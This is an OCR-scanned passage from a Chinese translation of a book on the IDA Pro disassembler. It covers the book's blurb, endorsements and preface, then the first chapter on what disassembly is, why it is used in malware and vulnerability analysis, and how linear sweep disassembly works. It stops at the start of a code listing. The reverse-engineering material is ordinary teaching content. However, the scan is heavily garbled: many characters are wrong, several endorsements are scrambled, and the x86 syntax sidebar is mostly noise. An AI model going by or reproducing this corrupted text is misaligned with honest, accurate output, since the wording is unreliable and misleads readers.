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图 灵 社 区 的 电子 书 没有 采用 专 有 客 
尸 端 ， 您 可 以 在 任意 设备 上 ， 
己 喜 欢 的 刘 览 器 和 PDF 阅读 器 进 
阅读 。 
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帐号 等 维权 措施 ， 并 可 能 退 究 法 律 
贡 任 。 
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内 容 提 要 


本 书 共 分 为 六 部 分 ， 首 先 介绍 了 反 汇 编 与 逆 癌 工程 的 基本 信息 和 IDA Pro 的 背景 知识 ， 接 着 讨论 了 
IDA Pro 的 基本 用 法 和 高 级 用 法 ， 然 后 讲解 了 其 高 扩展 性 及 其 在 安全 领域 的 实际 应 用 ， 最 后 介绍 了 IDA 的 
内 置 调试 器 (包括 Bochs 调试 器 )， 一 方面 让 用 户 对 IDA Pro 有 全 面 深入 的 了 解 ， 另 一 方面 让 读者 掌握 DA 
Pro 在 现实 中 的 应 用 。 相 比 上 一 版 ， 这 一 版 以 IDA6.0 为 基础 ， 介 绍 了 它 的 新 的 、 基 于 Qt 的 图 形 用 户 界面 ， 
以 及 IDAPython 插件 。 

本 书 适合 IT 领域 的 所 有 安全 工作 者 阅读 。 
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说 以 此 书 献 给 我 的 母亲 。 


对 上 一 版 的 赞 当 


“我 衷心 地 向 所 有 IDA Pro 用 户 推荐 《IDA Pro 权 威 指南 》 一 书 。” 
一 一 Ilfak Guilfanov, IDA Pro 的 开发 者 


“本 书 内 容 精 练 而 且 结 构 合理 …… 包 括 逐 步 深 入 的 示例 以 及 IDA 各 个 方面 所 必需 的 详细 信 
息 ， 是 你 学 习 IDA 的 最 佳 选 择 。” 





Cody Pierce, TippingPoint DVLabs 


"Chris Eagle2U AE Ze aime TEA, Duke Dn DUT Ar bilt HP 2 
懂 ， 并 且 总 是 能 够 提供 适当 的 示例 。” 





Dino Dai Zovi，Trail of Bits 博 客 


“本 书 不 仅 能 够 帮助 你 全 面 了 解 IDA Pro， 而 且 能 够 帮助 你 了 解 整 个 PE 流程 。 
———Ryan Linn, The Ethicai Hacker Network 


“本 书 内 容 甚 实 ， 信息 全 面 !” 





Eric Hulse，Carnal0wnage 博 客 


“迄今 为 止 最 全 面 、 最 准确 、 最 优秀 的 IDA Droit" 
Pierre Vandevenne, DataRescue SAJ % 3€ CEO 





“无 论 是 IDA Pro 的 初学 者 还 是 经 验 丰富 的 使 用 者 ， 我 强烈 建议 你 们 阅读 本 书 。 


— Dustin D. Trammell， 安 全 研究 员 


“我 强烈 建议 大 家 购买 本 书 。 它 结构 合理 ， 而 且 据 我 所 知 ， 它 比 任何 其 他 文档 ( 包括 IDA Pro 
手册 MEMEH.” 





Sebastian Porst， 微 软 高 级 软件 安全 工程 师 





“无 论 是 处 理 严重 的 运行 时 缺陷 ， 还 是 由 内 而 外 地 检查 应 用 程序 的 安全 ，IDA Pro 都 是 你 的 首 
选 工 具 ， 而 本 书 则 是 你 尽快 学 习 IDA Pro 的 指南 。 











Joe Stagner， 微 软 程序 经 理 


2 ` Si 


和 第 1 版 一 样 ， 我 想 感谢 家 人 在 我 撰写 本 书 时 给 予 我 的 支持 。 我 对 他 们 的 忍耐 和 宽容 深 
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最 后 ， 我 要 感谢 Alison Law 及 No Starch 出 版 社 的 所 有 工作 人 员 ， 他 们 的 辛 否 劳动 使 得 本 书 得 
以 顺利 出 版 。 
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撰写 一 本 关于 IDA Pro 的 书 是 一 个 充满 挑战 的 任务 。 EXE, IDA 是 一 款 非常 复杂 的 软件 , 它 
的 功能 特别 强大 , 要 在 一 本 书 中 详细 介绍 所 有 这 些 功 能 , 儿 乎 是 一 项 无 法 完成 的 任务 。 而 且 , IDA 
一 直 在 不 断 推出 新 版 本 ， 因 此 ， 任 何 介绍 IDA 的 图 书 在 出 版 时 都 会 落后 一 两 个 版 本 。 在 本 书 第 1 
版 即将 出 版 时 ，IDA 发 布 了 版 本 5.3, 但 自 本 书 第 1 版 出 版 以 来 ，IDA 已 发 布 了 7 个 新 版 本 (包括 版 
本 5.3 )。IDA 6.0 采 用 了 一 个 新 的 、 基 于 Qt 的 图 形 用 户 界 面 ， 这 促使 我 对 本 书 进 行 更 新 ， 以 介绍 
许多 第 1 版 并 未 介绍 的 功能 。 当 然 ， 和 往常 一 样 ，IDA 的 另 一 个 版 本 (6.1) 也 即将 发 布 ,，” 这 确 
实 让 人 非常 兴 耕 。 

我 撰写 这 一 版 的 目的 是 帮助 更 多 用 户 了 解 IDA， 并 培养 他 们 对 逆向 工程 的 兴趣 ( 如 果 可 能 )。 
对 于 希望 进入 逆向 工程 领域 的 读者 ,我 希望 向 你 们 强调 掌握 熟练 的 编程 技巧 的 重要 性 。 理 想 情况 下 ， 
你 们 应 热爱 编程 ,甚至 要 时 时 刻 刻 都 想 着 编程 。 如 果 你 对 编程 感到 腻 惧 , 那么 闭 向 工程 可 能 并 不 适 
合 你 。 你 可 能 会 认为 ,逆向 工程 根本 不 需要 编程 ,因为 这 只 需要 分 解 其 他 人 的 程序 , 但 如 果 无 法 开 
发 出 能 帮助 你 自动 完成 各 种 任务 的 脚本 和 插件 , 你 永远 也 不 可 能 成 为 真正 高 效 的 逆 问 工程 人 员 。 对 
我 而 言 ， 编 程 和 逆 亲 工程 就 像 是 《纽约 时 报 》 周 日 版 的 纵 模 字迹 游戏 ， 对 此 我 乐 在 其 中 。 

为 保持 一 致 性 ， 这 个 版 本 保留 了 第 1 版 的 总 体 结 构 ， 并 且 更 为 详细 地 阐述 了 部 分 章节 ， 同 时 
增加 了 一 些 新 内 容 。 阅 读本 书 的 方式 多 种 多 样 。 对 逆向 工程 知之 甚 少 的 用 户 可 以 从 第 1 章 和 第 2 
昔 开 始 ， 了 解 有 关 逆 回 工 程 和 反 汇 编 右 的 一 些 信息 ; 对 IDA 了 解 不 多 、 和 希望 深入 学 习 的 谈 者 可 以 
从 第 3 草 开 始 , 这 一 前 主要 介绍 IDA 的 基本 布局 ; 第 4 章 则 描述 如 何 局 动 IDA 并 加 载 文件 进行 分 析 ; 
第 $ 草 到 第 7 章 介绍 IDA 的 用 户 界 面 窗口 和 基本 功能 。 

对 IDA 有 一 定 了 解 的 读者 可 以 从 第 8 章 开 始 阅 读 , 这 一 章 讨 论 如 何 使 用 IDA 处 理 复 杂 的 数据 结 
构 ， 包 括 C++ 类 ; 而 第 9 章 则 介绍 IDA 交 叉 引 用 ， 它 是 IDA 基 于 图 形 的 显示 (也 在 第 9 章 介绍 ) 的 
基础 ; 第 10 章 说明 如 何在 非 Windows 平 台 上 (Linux 或 OS X ) 运行 IDA。 

更 加 高 级 的 IDA 用 户 可 能 会 发 现 ， 第 11 章 到 第 14 章 是 不 错 的 起 点 ， 主 要 介绍 IDA 的 高 级 用 法 及 
其 配套 工具 。 第 11 音 简要 说 明 IDA 的 一 些 配 置 选项 ; 第 12 董 描述 [DA 的 FLIRT/FLAIR 技 术 和 相关 工具 ， 
我 们 利用 它们 开发 签名 ,并 利用 这 些 签名 将 库 代 码 与 应 用 程序 代码 区 分 开 来 ; 第 13 章 讨论 IDA 类 型 
库 及 如 何 扩展 类 型 库 ; 而 第 14 章 则 回答 一 些 常 见 的 问题 ， 说 明 IDA 是 否 可 用 于 修补 二 进 制 文件 。 


































































































(D Qt 是 诺基亚 开发 的 一 个 路 平台 的 C++ 图 形 用 户 界 面 应 用 程序 框架 。 一 一 译 者 注 
(2 2011 年 4 月 发 布 了 IDA 6.1，2011 年 10 月 发 布 了 IDA 6.2。 一 一 编者 注 











IDA 是 一 称 即 装 即 用 的 强大 工具 ， 可 扩展 性 是 它 最 大 的 优点 之 一 ， 这 些 年 来 ， 用 户 利用 这 一 
优点 让 IDA 完 成 了 一 些 非常 有 趣 的 任务 IDA 的 可 扩展 性 在 第 15 章 到 第 19 章 讨论 ,第 15 章 介绍 IDA 
的 脚本 功能 ( 新 增 了 IDAPython )， 并 系统 讨论 IDA 的 SDK ( 软件 开发 工具 包 ) 提供 的 编程 API; 
第 16 章 全 面 介 绍 SDK; 而 第 17 章 到 第 19 章 则 讨论 插件 、 文 件 加 载 句 和 处 理 需 模块 。 

介绍 完 IDA 的 全 部 功能 后 ， 第 20 章 至 第 23 章 转 而 讨论 IDA 在 逆 癌 工程 方面 更 加 实际 的 用 法 ， 
分 析 各 种 编译 器 的 区 别 ( 第 20 章 ), 介绍 如 何 使 用 IDA 分 析 恶 意 软 件 中 常见 的 模糊 代码 (第 21 章 )， 
以 及 如 何 利 用 IDA 发 现 和 分 析 漏 洞 (第 22 章 )。 第 23 章 则 介绍 这 些 年 来 发 布 的 一 些 有 用 的 IDA 扩 展 
(插件 )。 

最 后 ， 第 24 章 至 第 26 章 介绍 IDA 的 内 置 调 试 句 。 第 24 章 首先 介绍 调试 融 的 基本 功能 ; 第 25 章 
讨论 使 用 调试 锅 分 析 模 糊 代码 遇 到 的 一 些 挑 战 , 其 中 包括 处 理 可 能 出 现 的 反 调试 功能 所 带 来 的 挑 
战 ; 第 26 草 则 讨论 IDA 的 远程 调试 功能 ， 以 及 使 用 Bochs 模 拟 需 作为 集成 的 调试 平台 ， 以 此 结 
本 书 的 讨论 。 

写作 本 书 时 ，IDA 的 最 新 版 本 为 6.1， 本 书 在 很 大 程度 上 以 IDA 6.1 为 介绍 对 象 。Hex-Rays 公 
司 非常 慷慨 ， 为 用 户 提 供 了 一 个 免费 版 本 。IDA 免 费 版 是 IDA 5.0 的 一 个 删 减 了 部 分 功能 的 版 本 。 
本 书 讨论 的 大 部 分 IDA 功 能 也 适用 于 免费 版 本 ， 附 录 A 简 要 介绍 了 用 户 在 使 用 免费 版 本 时 可 能 遇 
到 的 一 些 不 同 之 处 。 

首先 学 习 IDA 脚 本 功能 ， 然 后 逐步 学 习 如 何 创建 编译 搬 件 ， 这 似乎 是 一 个 自然 的 发 展 过 程 。 
KE, 我们 在 附录 B 中 全 面 介 绍 了 每 一 个 IDC 孔 数 及 其 对 应 的 SDK 操 作 。 有 时候， 你 可 以 在 IDC 
中 数 与 SDK 卫 数 之 间 建 立 起 一 一 对 应 的 关系 ( 尽管 这 些 饵 数 的 名 称 并 不 相同 ); 而 有 了 时候， 实现 
单独 一 个 IDC 捕 数 可 能 需要 调用 几 个 SDK 捕 数 。 附 录 B 回 答 了 这 个 问题 “我 知道 如 何 用 IDC 完 成 
AME, 但 是 ,如何 使 用 插件 完成 这 个 任务 呢 ? ”附录 B 中 的 信息 通过 逆向 工程 IDA 内 核 获 得 ， 
根据 IDA 的 非 传统 许可 协议 ， 这 样 做 完全 合法 。 

在 整 本 书 中 , 我 都 尽量 使 用 较 短 的 代码 说 明 问 题 。 绝 大 多 数 的 示例 代码 ， 以 及 许多 用 于 生成 
示例 的 二 进 制 文件 ， 都 可 以 在 本 书 的 官方 网 站 上 找到 ， 其 地 址 为 http:/www.idabook.com/。 在 那 
里 ， 你 还 可 以 找到 本 书 并 未 包含 的 一 些 示 例 ， 以 及 本 书 所 使 用 的 所 有 参考 文献 ( 如 脚注 中 引用 的 
URL 的 最 新 链接 )。 
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反 汇 编 简 介 








-会 到 一 本 专门 介绍 IDAPro 的 书 , 你 很 可 能 急切 地 想 知 道 书 里 会 讲 些 什么 。 很 明显 , 本 书 

=E p DA 为 中 心 , 但 我 并 不 希望 读者 将 其 作为 IDA Pro 用 户 手 册 。 相反 , 本 书 旨 在 将 IDA 
作为 推动 逆 癌 工程 技术 讨论 的 工具 。 你 会 发 现 , 在 分 析 各 种 软件 ( 包括 易 受 攻击 的 应 用 程序 和 和 恶 
意 软件 ) 时 ， 这 些 技术 非常 有 用 。 在 适当 的 时 候 ， 我 将 提供 在 使 用 IDA 时 需要 遵循 的 详细 步 又 ， 
好 让 你 执行 与 你 手头 的 任务 有 关 的 特殊 操作 。 因 此 ， 我 将 简略 地 介绍 DA 的 功能 ， 包 括 最 初 分 
析 文 件 时 需要 执行 的 基本 任务 ， 最 后 讨论 IDA 的 高 级 用 法 和 定制 功能 ( 用 来 解决 更 具 挑 战 性 的 
逆 问 工程 问题 )。 我 不 会 介绍 IDA 的 所 有 功能 。 但 是 ， 你 将 发 现 ,在 应 对 逆 回 工程 挑战 时 ， 本 书 
介绍 的 功能 极其 有 用 ， 这 也 使 得 IDA 成 为 你 工具 箱 中 最 强大 的 武器 。 

在 详细 介绍 IDA 之 前 ， 了 解 反 汇编 过 程 的 一 些 基础 知识 ， 以 及 其 他 一 些 对 编译 代码 进行 逆 
向 工程 的 可 用 工具 ,会 有 一 定好 处 。 虽 然 这 些 工 具 的 功能 都 不 如 IDA 全 面 ， 但 它们 具备 IDA 的 
一 部 分 功能 ， 有 助 于 我 们 了 解 IDA 的 某 些 功能 。 本 章 的 剩余 部 分 主要 介绍 反 汇 编 过 程 。 



































1.4 KR 








任何 学 过 编程 语言 的 人 都 知道 , 编程 语言 分 为 好 几 代 ， 下 面 为 那些 上 课 不 认真 的 读者 简要 总 
结 一 下 。 

OQ 第 一 代 语言 。 这 些 语言 是 最 低级 的 语言 ， 一 般 由 0 和 ! 或 某 些 简写 编码 ( 如 十 六 进 制 码 ) 
组 成 。 只 有 二 进 制 超人 才能 读 懂 它们 。 由 于 数据 和 指令 看 起 来 都 差不多 ， 人 们 往往 很 难 
将 它们 区 分 开 来 ， 因 此 这 种 语言 很 容易 造成 混淆 。 第 一 代 语言 也 称 为 机 器 语言 ， 有 时 也 
叫做 字 节 码 ， 而 机 器 语言 程序 常 被 称 为 二 进 制 文件 。 

第 二 代 语言 。 第 二 代 语 言 也 叫 汇编 语言 ， 它 只 是 一 种 脱离 了 机 器 语言 的 表 查 找 方式 。 通 
常 ， 汇 编 语言 会 将 具体 的 位 模式 或 操作 码 ， 与 短小 且 易 于 记忆 的 字符 序列 ( 即 助 记 符 
对 应 起 来 。 有 时 候 ， 这 些 助 记 符 确 实 有 助 于 程序 员 记 住 与 它们 有 关 的 指令 。 汇 编 器 是 程 
序 员 用 来 将 汇编 语言 程序 转换 成 能 够 执行 的 机 器 语言 的 工具 。 

D 第 三 代 语 言 。 这 些 语言 引入 了 关键 字 和 结构 ( 它们 是 程序 的 构建 块 )， 因 而 其 表达 能 力 更 
接近 于 自然 语言 。 通 常 ， 第 三 代 语 言 不 依赖 于 任何 平台 。 但 是 ， 由 于 用 第 三 代 语言 编写 
的 程序 使 用 了 特定 于 操作 系统 的 独特 功能 ， 它 们 便 具 有 了 平台 依赖 性 。 常 见 的 第 三 代 语 
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言 包括 FORTRAN, COBOL, CHI Java。 程 序 员 通 稼 使 用 编译 需 将 程序 转换 成 汇编 语言 ， 
或 者 直接 转换 成 机 右 语 言 (或 某 种 大 致 的 等 价 形式 ， 如 字 贡 人 码 )。 
口 第 四 代 语 言 。 这 些 语言 虽然 存在 ， 但 与 本 书 无 关 ， 因 而 不 属 本 书 的 讨论 范围 。 


1.2 何 为 反 汇编 


在 传统 的 软件 开发 模型 中 , 程序 员 使 用 编译 硕 、 汇 编 融 和 链接 需 中 的 一 个 或 几 个 创建 可 执行 
程序 。 为 了 回溯 编程 过 程 〈 或 对 程序 进行 逆 癌 工程 ), 我 们 使 用 各 种 工具 来 撤销 汇编 和 编译 过 程 。 
放 不 奇怪 ， 这 些 工 具 就 叫做 反 汇 编 器 和 反 编 译 器 ， 名 副 其 实 。 反 汇编 硕 撤 销 汇编 过 程 ， 因 此 , 我 
们 可 以 得 到 汇编 语言 形式 的 输出 结 有 末 《〈 以 机 融 语 言 作为 输入 )。 反 编译 右 则 以 汇编 语言 其 至 是 机 
det n Mm A. Haze, 

在 苋 争 激烈 的 软件 市 场 中 ,“ 恢 复 源 代码 ”的 前 景 总 是 充满 吸引 力 。 因 此 ,在 计算 机 科学 中 ， 
开发 适用 的 反 编 幸 带 仍然 是 一 个 活跃 的 人 研究 领域 .下面 列举 大 干 原因 ,说 明 为 何 反 汇编 困难 重重 。 

口 编译 过 程 会 造成 损失 。 机 帮 语 言 中 没有 变量 或 隆 数 名 ， 变量 类 型 信息 只 有 通过 数据 的 用 途 

( 而 不 是 显 式 的 类 型 声明 ) 来 确定 。 看 到 一 个 32 位 的 数据 被 传送 ， 你 需要 进行 一 番 分 析 ， 
才能 确定 这 个 32 位 数据 表示 的 到 上 瓜 是 一 个 整数 、 一 个 32 位 浮 点 值 还 是 一 个 32 位 指针 。 

口 编译 属于 多 对 多 操作 。 这 意味 着 源 程序 可 以 通过 许多 不 同 的 方式 转换 成 汇编 语言 ， 而 机 

从 声言 也 可 以 通过 许多 不 同 的 方式 转换 成 源 程序 。 因 此 ， 编 详 一 个 文件 ， 并 立即 反 编 详 ， 
可 能 会 得 到 与 输入 时 截然 不 同 的 源 文件 。 

口 反 编 译 器 非常 依赖 于 语言 和 库 。 用 专门 用 来 生成 C 代码 的 反 编 详 希 处 理由 Delphi 编译 硕 
生成 的 二 进 制 文件 ， 可 能 会 得 到 非常 奇怪 的 结果 。 同 样 ， 用 对 Windows 编程 API 一 无 所 
知 的 反 编 译 融 处 理 编译 后 的 Windows 二 进 制 文件 ， 也 不 会 得 到 任何 有 用 的 结 

口 要 想 准确 地 反 编 译 一 个 二 进 制 文件 ， 需 要 近乎 完美 的 反 汇 编 能 力 。 几 乎 可 以 肯定 ， 反 汇 
编 阶 段 的 任何 错误 或 遗漏 都 会 影响 反 编 详 代 码 。 

第 23 草 将 介绍 当今 市 场 上 最 复杂 的 反 编 译 希 Hex-Rays。 


1.3 为 何 反 汇编 


通常 , 使 用 反 汇 编 工 具 是 为 了 在 没有 源 代码 的 情况 下 促进 对 程序 的 了 解 。 需 要 进行 反 汇编 的 
第 见 情况 包括 以 下 几 种 。 

口 分 析 有 恶意 软件 。 

a 分 析 闭 源 软 件 的 着 洞 。 

a 分 析 闭 源 软件 的 互 操作 性 。 

O 分 析 编 详 希 生成 的 代码 ， 以 验证 编 详 融 的 性 能 和 准 硝 性 。 

O 在 调试 时 显示 程序 指令 。 

下 面 详细 介绍 上 述 每 一 种 情况 。 
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1.3.1 ”分析 恶意 软件 


通常 ， 恶 意 软 件 的 作者 很 少 会 提供 他 们 “作品 ”的 源 代码 ， 除 非 你 对 付 的 是 一 种 基于 脚本 的 
蜂 虫 。 由 于 缺乏 源 代 码 ， 要 准确 地 了 解 恶意 软 件 的 运行 机 制 ， 你 的 选择 非 党 有限。 动态 分 析 和 天 
态 分 析 是 分 析 恶 意 软 件 的 两 种 主要 技术 ,动态 分 析 ( dynamic analysis ) 是 指 在 严格 控制 的 环境 ( 沙 
fx ) 中 执行 恶意 软件 , 并 使 用 系统 检测 实用 工具 记录 其 所 有 行为 。 相反 , 静态 分 析 ( static analysis ) 
则 试图 通过 浏览 程序 代码 来 理解 程序 的 行为 。 此 时 , 要 查看 的 就 是 对 恶意 软件 进行 反 汇 编 之 后 得 
到 的 代码 清单 。 
































1.3.2 漏洞 分 析 


为 了 简单 起 见 ， 我 们 将 整个 安全 审核 过 程 划分 成 3 个 步 又 : 发 现 汤 洞 、 分 析 源 洞 、 开 发 破解 
程序 ( exploit )。 无 论 是 否 拥有 源 代 码 ， 虱 可 以 采用 这 些 步骤 来 进行 安全 审核 。 但 是 ， 如 采 只 有 
二 进 制 文件 ,你 可 能 需要 付出 巨大 的 努力 。 这 个 过 程 的 第 一 个 步骤, 是 发 现 程序 中 淤 在 的 可 供 利 
用 的 条 件 。 一 般 情况 下 ， 我 们 可 通过 模糊 测试 “等 动态 技术 来 达到 这 一 目的 ， 也 可 通过 静态 分 析 
来 实现 (通常 需要 付出 更 大 的 努力 )。 一 旦 发 现 漏洞 ， 通 党 需要 对 其 进行 深入 分 析 ， 以 确定 该 漏 
洞 是 否 可 被 利用 ， 如 来 可 利用 ， 可 在 什么 情况 下 利用 。 

至 于 编译 天 究竟 如 何 分 配 程序 变量 ,， 反 汇编 代码 清单 提供 了 详细 的 信息 。 例 如 , 程序 员 声 明 
的 一 个 70 字 市 的 字符 数组 , 在 由 编 详 大 分 配 时 , 会 扩大 到 80 675, 知道 这 一 点 会 很 有 用 。 为 外 ， 
要 了 解 编 详 带 到 底 如 何 对 全 局 声明 或 在 也 数 中 声明 的 所 有 变量 进行 排序 , 查看 反 汇 编 代 码 清单 是 
唯一 的 办 法 。 在 开发 破解 程序 时 ， 了 解 变 量 之 间 的 这 些 空间 关系 往往 非常 重要 。 最 后 ， 通 过 结合 
使 用 反 汇 编 大 和 调试 融 ， 就 可 以 开发 出 破解 程序 。 


1.3.3 ”软件 互 操作 性 


如 末 仅 以 二 进 制 形式 发 布 软件 , 苋 争 对 手 要 想 创建 可 以 和 它 互 操作 的 软件 , 或 者 为 该 软件 提供 
插件 , 将 会 非常 困难 。 人 针对 菏 个 仅 有 一 种 平台 支持 的 便 件 而 发 布 的 驱动 程序 代码 , 就 是 一 个 第 见 的 
例子 。 如 果 厂 商 暂 时 不 支持 , 或 者 更 糟糕 地 , 拒绝 支持 在 其 他 平台 上 使 用 他 们 的 硬件 , 那么 为 了 开 
发 文 持 该 便 件 的 软件 驱动 程序 , 可 能 需要 完成 大 量 的 逆向 工程 工作 。 在 这 些 情况 下 ,项 态 代码 分 析 
几乎 是 唯一 的 补救 方法 。 通 肖 ， 为 了 理解 鹏 入 式 固 件 ， 还 需要 分 析 软 件 驱 动 程序 以 外 的 代码 。 



























































1.3.4 ”编译 器 验证 

Hi ARES (Cai) 的 用 途 是 生成 机 带 语 言 ， 因 此 优秀 的 反 汇 编 工具 通 弟 需要 验证 编 详 
Tite fH CH AS 分 析 人 员 还 可 以 从 中 寻找 优化 编译 带 输 出 的 机 会 ， 从 安全 角度 来 看 ,还 可 
碍 知 编 详 天 本 吴 是 否 容易 被 攻破 ， 以 至 于 可 以 在 生成 的 代码 中 搬入 后 门 ， 等 等 。 

















CD 模糊 测试 是 一 种 发 现 漏洞 的 技术 , 它 为 程序 生成 大 量 不 常见 的 输入 , 希望 其 中 一 个 输入 会 在 程序 中 造成 可 被 检测 、 
分 析 ， 最 终 可 被 利 用 的 错误 。 
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1.3.5 ”显示 调试 信息 


在 调试 带 中 生成 代码 消 蛙 ， 可 能 是 反 汇 编 带 最 第 见 的 一 种 用 途 。 遗 憾 的 是 ,调试 大 中 内 骸 的 
反 汇 编 融 往往 相当 简单 。 它 们 通 稼 不 能 批量 反 汇 编 ， 在 无 法 确定 函数 边界 时 ， 它 们 有 时 候 会 拒绝 
反 汇 编 。 因 此 ,在 调试 过 程 中 ,为 了 解 详细 的 环境 和 背景 信息 ， 最 好 是 结合 使 用 调试 可 与 优秀 的 
boil HA o 


1.4 如 何 反 汇编 


现在 ,你 已 经 知道 了 反 汇 编 的 目的 ， 接 下 来 介绍 如 何 反 汇 编 。 以 反 汇 编 圳 所 面临 的 一 个 艰 巨 
任务 为 例 : 对 于 一 个 100 KB 的 文件 ,请 区 分 其 中 的 代码 与 数据 ， 并 把 代码 转换 成 汇编 语言 显示 
给 用 户 。 在 整个 过 程 中 ,不 要 送 漏 任何 信息 。 在 这 个 任务 中 ， 我 们 还 可 以 附加 许多 特殊 要 求 ， 
如 要 求 反 汇 编 右 定位 函数 ,识别 跳 转 表 并 确定 局 部 变量 ， 这 进一步 增加 了 反 汇 编 右 工作 的 难度 。 

为 了 满足 所 有 要 求 , 反 汇 编 带 必须 从 大 量 算法 中 选择 一 些 适当 的 算法 , 来 处 理 我 们 提供 的 文 
件 。 反 汇编 右 所 使 用 算法 的 质量 及 其 实施 算法 的 效率 ， 将 直接 影响 所 生成 的 反 汇 编 代码 的 质量 。 
在 这 一 节 中 , 我 们 将 讨论 当前 对 机 器 代码 反 汇 编 时 所 使 用 的 两 种 基本 算法 。 在 介绍 这 些 算法 的 同 
时 ,我 们 还 将 指出 它们 的 缺陷 ， 以 便于 你 对 反 汇 编 右 失效 的 情形 有 所 防备 。 了 解 反 汇编 融 的 局 限 
后 ， 就 可 以 通过 手动 干预 来 提高 反 汇 编 输出 的 整体 质量 了 。 


1.4.1 基本 的 反 汇 编 算 法 


为 方便 初学 者 ,首先 开发 一 个 以 机 需 霹 言 为 输入 、 以 汇编 语言 为 输出 的 简单 算法 。 这 样 做 有 
助 于 我 们 了 解 目 动 反 汇 编 过 程 中 的 挑战 、 假 设 和 折 中 方案 。 

口 第 一 步 。 确 定 进行 反 汇 编 的 代码 区 域 。 这 并 不 像 看 起 来 那么 简单。 通常 ， 指 令 与 数据 混 
PREE, 区 分 它们 就 显得 非常 重要 。 以 最 常见 的 情形 一 一 反 汇 编 可 执行 文件 一 一 为 例 ， 
该 文件 必须 符合 可 执行 文件 的 某 种 通用 格式 ， 如 Windows 所 使 用 的 可 移植 可 执行 
( Portable Executable, PE ) 格式 或 许多 Unix 系统 常用 的 可 执行 和 链接 格式 ( Executable and 
linking format, ELF )。 这 些 格式 通常 含有 一 种 机 制 ， 用 来 确定 文件 中 包含 代码 和 代码 入 
口 点 的 部 分 的 位 置 (通常 表现 为 层级 文件 头 的 形式 )。 

口 第 二 步 。 知 道 指 令 的 起 始 地 址 后 ， 下 一 步 就 是 读 取 该 地 址 (或 文件 偏 移 量 ) 所 包含 的 值 ， 
并 执行 一 次 表 查 找 ， 将 二 进 制 操作 但 的 值 与 它 的 汇编 声言 助 记 符 对 应 起 来 。 根 据 被 反 汇 
编 的 指令 集 的 复杂 程度 ， 这 个 过 程 可 能 非常 简单 ， 也 可 能 需要 几 个 额外 的 操作 ， 如 查 明 
任何 可 能 修改 指令 行为 的 前 级 以 及 确定 指令 所 需 的 操作 数 。 对 于 指令 长 度 可 变 的 指令 集 ， 
如 Intel x86， 要 完全 反 汇 编 一 条 指令 ， 可 能 需要 检索 额外 的 指令 字 节 。 

口 第 三 步 。 获 取 指 令 并 解码 任何 所 需 的 操作 数 后 ， 需 要 对 它 的 汇编 语言 等 价 形 式 进 行 格式 



























































CD 代码 入 口 点 是 一 个 指令 地 址 ， 一 旦 程序 加 载 到 内 存 ， 操 作 系统 就 将 控制 权 交 给 该 指令 。 
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化 ， 并 将 其 在 反 汇 编 代 人 码 中 输出 。 有 多 种 汇编 语言 输出 格式 可 供 选 择 。 例 如 ，x86 汇编 语 
言 所 使 用 的 两 种 主要 格式 为 Intel 格式 和 AT&T 格式 。 

口 第 四 步 。 输 出 一 条 指令 后 ， 继 续 反 汇编 下 一 条 指令 ， 并 重复 上 述 过 程 ， 直 到 反 汇 编 完 文 
件 中 的 所 有 指令 。 














x86 汇编 语法 : AT&T 和 Intel 


中 中 病员 天 
四 加 
TEE E T e EE oE Daren o TEC D D VD ELLO DELL BL D DE D. D. DUU SELBE O DE UO. BLEE DU 
O E OCO E 0 0 E DOP B: BE HBS A BEBE EL IBI BEL E LEL BEI LE BEBE DH OE BEBE HET TBI LB 
[Il] AT&T[I]I [D [] EAXII HH [] HH A ED] HE UO LU add $0x4,2eaxt] GNUO HH B Goal! E] E] E] E] 
U ONUUUUU seet! gdo UU AT&T O L 

mteel[[[] f) AISTUDUUDUDUDUUUDOUDUDODDUDOUDUUDUDU DU AT&T 
OE E o e a E E o E E a o a o E a o E o Int [ATI DUDU 
O O UU U addeax, 0x40 O E] Intel f] [] EJ E] DJ] E] EJ E] BJ E] D] E] ULU MASMI] Borland[] Turbo 
O O U U TASMI] O Netwide[] O O U NASMIT] 


有 大 量 算法 可 用 于 确定 从 何 处 开始 反 汇 编 , 如 何 选 择 下 一 条 反 汇 编 的 指令 , 如 何 区 分 代码 与 
数据 ， 以 及 如 何 确 定 何 时 完成 对 最 后 一 条 指令 的 反 汇 编 。 线 性 扫描 【1linear sweep ) 和 递归 下 降 
( recursive descent ) 是 两 种 最 主要 的 反 汇 编 算 法 。 





1.4.2 ”线性 扫 接 反 汇 编 


线性 扫 摘 反 汇 编 算法 采用 一 种 非常 简单 的 方法 来 确定 知 要 反 汇 编 的 指令 的 位 置 :一 条 指令 结 
束 、 为 一 条 指令 开始 的 地 方 。 因 此 ,确定 起 始 位 置 最 为 困难 。 常 用 的 解决 办 法 是 , 假设 程序 中 标 
注 为 代码 (通常 由 程序 文件 的 头 部 指定 ) 的 节 所 包含 的 全 部 是 机 带 语 言 指令 。 反 汇编 从 一 个 代码 
段 的 第 一 个 字 节 开始 , 以 线性 模式 扫描 整个 代码 段 , 逐条 反 汇 编 每 条 指令 , 直到 完成 整个 代码 段 。 
这 种 算法 并 不 会 通过 识别 分 文 等 非 线性 指令 来 了 解 程序 的 控制 流 。 

进行 反 汇 编 时 , 可 以 维护 一 个 指针 来 标注 当前 正在 反 汇 编 的 指令 的 起 始 位 置 。 在 反 汇 编 过 程 
中 ,每 一 条 指令 的 长 度 都 被 计算 出 来 ， 并 用 来 确定 下 一 条 将 要 反 汇 编 的 指令 的 位 置 。 为 此 ， 对 由 
长 度 固定 的 指令 构成 的 指令 集 ( 如 MIPS) 进行 反 汇 编 有 时 会 更 加 容易 ， 因 为 这 时 可 轻松 定位 随 
后 的 指令 。 

线性 扫 摘 算法 的 主要 优点 , TET E BESTE TE s ERIT BUCH TREES 线性 扫描 方法 的 一 个 主 
要 缺点 ， 是 它 设 有 考虑 到 代码 中 可 能 混 有 数据 。 代 码 清单 1-1 就 说 明了 这 个 问题 , 它 显示 的 是 用 
线性 扫 措 反 汇编 硕 反 汇编 一 个 函数 所 得 到 的 输出 绪 采 。 这 个 函数 包含 一 个 switch 语句 ， 这 里 使 
用 的 编 详 肖 选择 使 用 跳 转 表 来 执行 switch 语句 。 而 且 ， 编 详 冀 选择 在 函数 本 里 中 区 入 一 个 跳 转 












































LA ”如 何 反 汇编 fi 








dé. 401250 (©) 处 的 jmp 语句 引用 了 一 个 以 401257 (0) 为 起 始 位 置 的 地 址 表 。 但 是 ， 反 汇编 
ZS (9) 作为 一 条 指令 来 处 理 ， 并 错误 地 生成 了 其 对 应 的 汇编 语言 形式 。 


代码 清单 1-1 线性 扫描 反 汇 编 


40123f: 55 push ebp 
401240: 8b ec mov ebp,esp 
401242: 33 cO xor eax,eax 
